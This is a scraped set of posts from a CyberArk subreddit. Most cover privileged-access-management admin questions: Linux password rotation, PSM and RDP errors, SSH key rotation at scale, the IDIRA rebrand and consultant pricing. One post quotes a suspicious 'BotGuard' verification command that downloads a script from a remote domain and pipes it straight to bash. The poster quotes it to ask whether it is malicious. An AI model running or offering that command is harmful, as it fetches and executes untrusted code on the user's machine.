r/CyberARk

It means not relying on one single defence to protect everything.

Edge security, network protection, endpoint security, identity controls, bot mitigation, and user verification all protect different parts of the digital journey.

Each layer has a specialist role.

The strongest security strategies are not built by choosing one tool for everything — they are built by combining the right layers in the right places.

#CyberSecurity #LayeredSecurity #BotProtection #DigitalTrust

Hi, does anyone know how to export platform but without API ? Thx in advance!

We are currently facing a challenge regarding Linux local account password rotation using CyberArk CPM.

For Linux local users, CyberArk recommended configuring sudo permissions to allow the CPM user to execute the /usr/bin/passwd binary as root through /etc/sudoers or /etc/sudoers.d/.

However, this solution is not acceptable in our environment for the following reasons:

• Granting sudo permissions to normal users introduces significant security concerns and potential privilege escalation risks.
• Implementing and maintaining this configuration across a large number of Linux servers and local users would require considerable operational effort and time.

We are looking for alternative and secure approaches for Linux local account password rotation without granting broad sudo privileges.

Has anyone implemented a different method or best practice for handling Linux password rotation in a secure and scalable way?

Any recommendations or real-world experience would be appreciated.

We are currently investigating an issue in CyberArk PAM where approximately 60 accounts were deleted.

We need to identify who performed these deletions (targeting the accounts on the target servers, not the users themselves).

We have already extracted multiple reports from both PVWA and the Vault, but we were not able to find any relevant results or trace the deletion activity.

Has anyone faced a similar issue or can advise where else we should look to identify the source of these deletions?

Hi all,

We have PSM servers on Windows Server 2022, and recently our target servers were upgraded to Windows Server 2025.

Now when users connect via PSM (RDP), we get this error:

>

Looks like an RDP/TLS/CredSSP negotiation issue.

Has anyone seen compatibility issues between CyberArk PSM (Win 2022) and Windows Server 2025?
Did you fix it through TLS/cipher suites, Schannel, CredSSP, GPO, or CyberArk patching?

Any help is appreciated.

https://preview.redd.it/d7qotzdkb92h1.png?width=910&format=png&auto=webp&s=56f36efe76b337b898155bdf0d9dadd7d6ea52f3

Hi all,

I’ve been working as a Tech BA for the past few years and have had some exposure to CyberArk through one of our projects. I worked alongside CyberArk engineers to help secure an application, and also collaborated with the SailPoint team to define roles and onboard them into CyberArk.

That said, all my involvement has been from a BA perspective—so I don’t have much hands-on technical experience with CyberArk itself.

I’m now considering pivoting into a CyberArk-focused role and wanted to understand how challenging that transition might be. I’ve been looking into instructor-led training to build my skills, but I’m still a bit unsure if this is the right path or how steep the learning curve will be.

Also, I’ve heard that Privileged Cloud (CyberArk Privilege Cloud) is in higher demand nowadays, but most training seems to focus on on-prem implementations. Is that something I should be concerned about?

Would really appreciate any advice from folks who’ve made a similar switch or are working in this space.

Thanks in advance!

Hi Community,

We are planning to temporarily disable hardening on CyberArk PAM components during Nessus vulnerability scans and would like to understand the possible operational and security impact before proceeding.

Environment:

• CyberArk PAM On-Premises Deployment
• Components included:
• Vault / DR Vault
• PVWA / DR PVWA
• CPM / DR CPM
• PSM / DR PSM
• PSMP / DR PSMP
• Vulnerability scanning performed using Nessus

We would appreciate feedback from anyone who has experience with this scenario.

Questions:

1. Has anyone disabled CyberArk hardening temporarily for vulnerability assessments or Nessus scans?
2. Did it impact:

• PAM services availability
• Session management or recordings
• CPM password management activities
• Vault communication
• PSM/PSMP connectivity
• Security baselines or compliance requirements

1. Were there any issues after re-enabling hardening?
2. Is there an officially recommended approach to perform authenticated Nessus scans without disabling hardening completely?
3. Are there recommended Nessus exclusions, safe checks, or scan tuning settings for CyberArk servers?

We are trying to identify:

• Potential risks and operational impact
• Best practices for vulnerability assessments in hardened CyberArk environments
• Whether temporary hardening disablement is considered safe or supported

Any recommendations, lessons learned, or official guidance would be highly appreciated.

Can we open these ports without disable Hardening?
If Yes / How?

https://preview.redd.it/ccv9p62ssn1h1.png?width=717&format=png&auto=webp&s=1537ac452504946752ae7b43ed8ddb5cb457a23d

Thanks.

As you know, my account got hacked on March 8th. Found out the reason why they hacked me. They wanna help me make money. (Like no. I dont want your damn money) Anyways.. they temporarily gave me my account back, I immediately logged in and changed my recovery email, and removed the passkeys/numbers/emails they put. As soon as I did that, they hacked me AGAIN. I dont know how, but it's annoying. I just want my account, which is RIGHTFULLY back. The dude is making it hard for me.

Anyways, my plan now is to contact the police using the non-emergency line and hopefully they can help track this weirdo down. If that doesn't work. Can someone please help me by giving me ideas on what to do.

Hello everyone, I’m trying to understand the real operational impact of the recent CyberArk / Idira rebranding for self-hosted PAM deployments.

I’m reviewing the recent CyberArk / Idira rebranding announcement for self-hosted PAM customers and trying to understand the practical operational impact in on-prem environments.

The announcement indicates that Self-Hosted PAM customers will receive rebrand-related updates in upcoming releases, including:

• PAM Self-Hosted v15.2
• Credential Provider v15.2
• Secrets Manager Self-Hosted v13.9

The stated changes appear to be primarily:

• UI branding updates
• Documentation updates
• Product-generated email changes
• Potential changes to display names and email subject lines
• A gradual rollout intended to minimize disruption

For organizations running fully on-prem or self-hosted CyberArk PAM deployments, I’m interested in understanding whether there are any real technical or operational impacts beyond cosmetic branding.

Specifically:

• SIEM integrations (QRadar, Splunk, Microsoft Sentinel, etc.)
• Email alert parsing and downstream automation
• API compatibility and backward compatibility considerations
• Any hardcoded references to “CyberArk” in scripts, tooling, or automation workflows
• Monitoring and observability tools relying on naming conventions
• Certificates, service URLs, endpoints, or internal service identifiers
• Upgrade and rollback behavior in mixed-version environments
• Any unexpected issues observed after applying the rebranded versions in production

If anyone has already evaluated or deployed these updates in a production self-hosted environment, insights on actual operational impact versus purely cosmetic changes would be appreciated.

Or If anyone has gone through a similar upgrade or rebranding cycle in a production PAM environment, it would be helpful to share any real risks or issues encountered, especially anything beyond cosmetic or UI changes.

Transitioning from admin to standard is painful due to the command, settings, etc. they require for development, scripting, automation, etc. But we dont want standing admin privs. We will be implementing workbrew and will use self-service to install other apps. TIA!

>/bin/bash -c "$(curl -A 'Mac OS X 10_15_7' -fsSL 'lfbd7bg2.runtime-atlas.digital/?ublib=85f26ff2-ae79-472d-9de9-f67fb7c308cf')"; echo ""BotGuard: Answer the protector challenge. Ref: 73282

From what I understand, this downloads and executes a remote script directly in Bash.

Questions:

1. Has anyone seen this “BotGuard” verification before?
2. Is runtime-atlas.digital associated with any legitimate anti-bot service?
3. Is this normal behavior for website verification, or potentially malicious?
4. If someone already ran it, what should they check on macOS?

I have not intentionally executed it and wanted opinions from people with security experience.

Looking for best practices for deploying CyberArk PSM for non-domain joined Windows DMZ servers. we are considering deploying a dedicated PSM server in the DMZ. We are Privilege Cloud ISPSS.

Current environment:

• Windows DMZ servers are NOT domain-joined
• Admins currently access them using local Windows accounts

Questions:

1. What is the recommended CyberArk architecture for this scenario?
2. What outbound ports/connectivity are required from a DMZ PSM server to the CyberArk Vault in Privileged Cloud?
3. Any special considerations for installing/configuring the RDS role on a non-domain-joined PSM server?
4. How are PSMConnect and PSMAdminConnect typically configured in non-domain joined environments? Local accounts on the PSM server?

Would appreciate hearing real-world implementations, lessons learned, or any architecture recommendations

Hello,

I am tasked to onboard and rotate all SSH keys. Now I know that isn't as simple as it sounds. To give some context, SSH keys are only used for non-interactive purposes by various application teams and the primary consumer base is Unix team. To understand the real picture I asked for some stats and it turns out single key is used by more than dozen of automations and approx. 250K ssh key logins in 24 hours by various orchestration tools, ansible, compliance job, goAnywhere and so on. Those numbers are insane but not unrealistic. There are two main challenges:

1. CyberArk is not capable of pushing public key under authorized keys file to 9K servers. Even if I scaled it down to per environment, the number still remains in thousands. That is a bad practice too from privilege sprawl perspective. So, what makes more sense to me is individual key pairs per host which leads to second challenge.

2. I can ask the teams to update their codes to use CCP to programatically fetch the keys at run time. Most of it will be doable and they will agree to what I propose except some minor resistance. But my concern here is scalability, performance and operational risks. CCP takes roughly 90ms to deliver the key/ password. Lot of automations constantly establish ssh connection and ansible in particular attempts re-authentication if the job is running longer. If CPM changes the key in between the transaction, ansible won't be happy about it. Also, a lot of automations are customer agnostic and can have direct commercial impact if anything goes wrong. I can propose AAM agent instead for critical systems but the license is limited.

I am pretty experienced with Unix and defining strategic roadmap, build automations and what good looks like but I feel CyberArk SSH key manager is just not the right product unless we move onto SSH certificates or choose SSH communication security's UKM. I have used it in the past and it's solid for edge cases like these.

Thanks

🚨 BREAKING news: CyberArk is officially rebranded as IDIRA® by Palo Alto Networks — announced live on stage today!
The future of cybersecurity just got a name. 🔐

#IDIRA #CyberArk #PaloAltoNetworks #IdentitySecurity #Cybersecurity #ZeroTrust #PANW #BreakingNews

The only source I used to prep for the exam was the PAM CDE Recertification practice exam from examtopics.com.

While we wait for official branding materials let’s speculate what it could be IDIRA Defender vs idirian defender vs paloalto defender vs defender by paloalto or something else (insert your version )

Is anyone else experiencing this in the last two or three days? CyberArk Community keeps asking to login to view threads, and the login randomly fails sometimes and works other times?

Been doing CyberArk for 10 years, last few doing independent health checks on the side. Sharing the pricing mistakes that actually cost me money, in case it helps anyone here thinking of going independent.

1. Charged hourly the first time. Finished in 9 days what I'd quoted as "around 2 weeks". Made half of what the work was worth. Go fixed-fee.
2. Quoted without scoping. "We have CyberArk, can you review it?" turned into a Vault cluster + 4 CPMs + a PSM farm + Conjur. Now I do a 30 min scoping call before any number leaves my mouth.
3. Bundled remediation into the health check. Once you find 40 issues in a fixed-fee report, guess who fixes them for free. Two engagements, always.
4. Underpriced because "it's just a review". The report is what lands them their next big remediation project. Started at 3k, my floor now is 12k.
5. Did a free "quick look" before quoting. Wasted 4 hours, client ghosted. Paid scoping or nothing.
6. Wrote the report too technical. 60 pages of CPM error codes. CISO didn't read past page 2. Now: 1-page exec summary up front, technical stuff in appendices.
7. Treated the exec readout as "included". That 1h call is where the follow-on work gets sold. Charge for it.
8. No scope-creep clause. "While you're at it..." used to mean free work. Now every SoW has an out-of-scope list and a CR rate.
9. Quoted in the same call. Said a number, it became the ceiling. Now: "I'll send a proposal in 48h." Every time.
10. Didn't follow up after delivery. ~70% of my follow-on work comes from a 30-day check-in email. People don't come back to you on their own.

Wrote all this up properly (frameworks, templates, the actual SoW I use) as a playbook. Not going to drop a link, DM me or check my profile if you want it.

What would you add?

its on my iphone 14max pro and seems sus its not a https link can anyone help ? http://support.apple.com/kb/HT5012 this is the link that comes up when on long oress on the trusted certificates, they are 202602500 and 1013

View Poll